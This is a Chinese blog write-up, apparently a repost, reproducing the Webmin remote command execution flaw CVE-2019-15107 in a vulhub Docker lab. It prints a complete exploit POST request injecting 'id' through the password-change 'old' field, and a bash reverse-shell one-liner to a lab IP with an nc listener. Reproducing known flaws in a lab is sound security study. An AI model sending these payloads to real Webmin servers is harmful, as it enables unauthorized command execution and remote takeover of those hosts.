码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Webmin 远程命令执行漏洞_CVE-2019-15107


    Webmin 远程命令执行漏洞_CVE-2019-15107

    文章目录

      • Webmin 远程命令执行漏洞_CVE-2019-15107
        • 在线漏洞详情:
        • 漏洞描述:
        • 版本影响:
        • 环境搭建
        • 漏洞复现
        • 使用BP进行抓包
          • POC
          • 发送以下POST请求来执行命令id:
          • 复现成功
        • 漏洞利用-shell反弹
          • 执行反弹指令
          • bp的id替换成url编码反弹shell脚本
          • 成功反弹

    在线漏洞详情:

    https://vulhub.org/#/environments/webmin/CVE-2019-15107/
    
    • 1

    在这里插入图片描述

    漏洞描述:

    在这里插入图片描述

    版本影响:

    ​ Webmin 1.910

    环境搭建

    cd ~/vulhub/webmin/CVE-2019-15107
    
    • 1

    在这里插入图片描述

    环境启动:

    sudo docker-compose up -d  # 下载拉取环境
    
    sudo docker ps -a  # 查看下载拉取的文件
    
    • 1
    • 2
    • 3

    已启动:访问端口10000

    在这里插入图片描述

    漏洞复现

    访问https://192.168.225.166:10000/
    在这里插入图片描述

    使用BP进行抓包

    POC
    POST /password_change.cgi
    
    • 1
    发送以下POST请求来执行命令id:
    POST /password_change.cgi HTTP/1.1
    Host: your-ip:10000
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: redirect=1; testing=1; sid=x; sessiontest=1
    Referer: https://your-ip:10000/session_login.cgi
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 60
    
    user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    复现成功

    在这里插入图片描述

    漏洞利用-shell反弹

    执行反弹指令
    bash -c "bash -i &> /dev/tcp/192.168.225.166/6666 0<&1" 
    
    nc  -lvp  6666 
    
    • 1
    • 2
    • 3
    bp的id替换成url编码反弹shell脚本

    在这里插入图片描述

    成功反弹

    在这里插入图片描述

  • 相关阅读:
    CANOpen之PDO传输
    力扣739:每日温度 (Java多种方法)
    请求转发和重定向区别
    windows 2012 server 禁止某个IP不可以访问指定端口
    UDS知识整理(四):ECU复位——0x11服务
    经纬恒润推出全新一代智能电动座椅模块
    ctfshow—溯源—新手上路
    Ubuntu安装桌面环境以及远程桌面连接
    【JavaWeb】Servlet详解
    最全讲解磁珠
  • 原文地址:https://blog.csdn.net/weixin_42786460/article/details/133827769
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号